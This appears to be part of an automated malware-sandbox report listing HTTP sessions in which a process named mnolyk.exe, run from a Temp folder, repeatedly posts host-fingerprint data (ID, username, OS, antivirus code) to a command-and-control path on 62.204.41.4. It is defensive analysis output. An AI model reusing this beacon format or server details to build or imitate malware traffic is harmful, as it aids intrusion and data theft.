                                                                      176 | 192.168.2.7 | 49902 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:43.303335905 CET | 622 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:43.368645906 CET | 622 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      177 | 192.168.2.7 | 49903 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:43.538749933 CET | 623 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:43.603050947 CET | 623 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      178 | 192.168.2.7 | 49904 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:43.781749964 CET | 624 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:43.847826958 CET | 624 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      179 | 192.168.2.7 | 49905 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:44.026160002 CET | 625 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:44.092535973 CET | 625 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      18 | 192.168.2.7 | 49742 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:01.986509085 CET | 449 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:02.050532103 CET | 450 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      180 | 192.168.2.7 | 49906 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:47.288237095 CET | 626 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:47.353909969 CET | 626 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      181 | 192.168.2.7 | 49907 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:47.522865057 CET | 627 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:47.586518049 CET | 627 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      182 | 192.168.2.7 | 49908 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:47.759181023 CET | 628 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:47.823967934 CET | 628 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      183 | 192.168.2.7 | 49909 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:47.991595030 CET | 629 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:48.057262897 CET | 629 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      184 | 192.168.2.7 | 49910 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:48.230041981 CET | 630 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:48.295130014 CET | 630 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      185 | 192.168.2.7 | 49911 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:48.462366104 CET | 631 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:48.527606964 CET | 631 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      186 | 192.168.2.7 | 49912 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:48.704071045 CET | 632 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:48.767746925 CET | 632 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      187 | 192.168.2.7 | 49913 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:48.947845936 CET | 633 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:49.011852980 CET | 633 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      188 | 192.168.2.7 | 49914 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:49.185767889 CET | 634 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:49.253202915 CET | 634 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      189 | 192.168.2.7 | 49915 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:49.430013895 CET | 635 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:49.494277000 CET | 635 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      19 | 192.168.2.7 | 49743 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:02.235831976 CET | 451 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:02.300020933 CET | 451 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      190 | 192.168.2.7 | 49916 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:49.663084984 CET | 636 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:49.726577997 CET | 636 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      191 | 192.168.2.7 | 49917 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:49.905139923 CET | 637 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:49.969903946 CET | 637 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      192 | 192.168.2.7 | 49918 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:50.149977922 CET | 638 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:50.215410948 CET | 638 | IN | HTTP/1.1 200 OK
